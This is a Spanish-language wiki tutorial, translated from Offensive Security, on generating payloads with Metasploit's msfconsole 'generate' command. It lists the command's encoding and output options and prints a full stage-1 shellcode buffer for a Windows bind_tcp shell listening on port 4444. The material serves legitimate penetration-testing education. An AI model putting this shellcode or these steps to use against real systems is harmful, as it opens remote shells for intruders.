Generando Payloads

De www.metasploit-es.com.ar

Generando Payloads en Metasploit

Durante el desarrollo de un exploit, probablemente necesitaras generar shellcode para utilizar en tu exploit. En Metasploit son payloads se pueden generar desde dentro de msfconsole. Cuando 'use' cierto payload, Metasploit añade el comando 'generate'. 

  msf > use payload/windows/shell/bind_tcp
  msf payload(bind_tcp) > help
  ...snip...
  Payload Commands
  ================
   Command       Description
   -------       -----------
   generate      Generates a payload

  msf payload(bind_tcp) > generate -h
  Usage: generate [options]
  Generates a payload.
  OPTIONS:
   -E        Force encoding.
   -b   The list of characters to avoid: '\x00\xff'
   -e   The name of the encoder module to use.
   -f   The output file name (otherwise stdout)
   -h        Help banner.
   -i   the number of encoding iterations.
   -k        Keep the template executable functional
   -o   A comma separated list of options in VAR=VAL format.
   -p   The Platform for output.
   -s   NOP sled length.
   -t   The output format: raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war          
   -x   The executable template to use

Para generar codigo shell (shellcode) sin ninguna opcion, simplemente ejecutar el comando 'generate'. 

  msf payload(bind_tcp) > generate
  # windows/shell/bind_tcp - 298 bytes (stage 1)
  # http://www.metasploit.com
  # EXITFUNC=thread, LPORT=4444, RHOST=
  buf =
  "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +
  "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
  "\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" +
  "\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" +
  "\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
  "\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" +
  "\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" +
  "\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
  "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" +
  "\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
  "\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f" +
  "\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29" +
  "\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50" +
  "\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x31\xdb" +
  "\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\xc2" +
  "\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5" +
  "\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75" +
  "\x6e\x4d\x61\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9" +
  "\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56" +
  "\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56" +
  "\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85" +
  "\xf6\x75\xec\xc3"
  ...snip...



© Offensive Security 2009 

Original de www.offensive-security.com
Traducido por cbk999
Obtenido de «http://www.metasploit-es.com.ar/wiki/index.php/Generando_Payloads»
Herramientas personales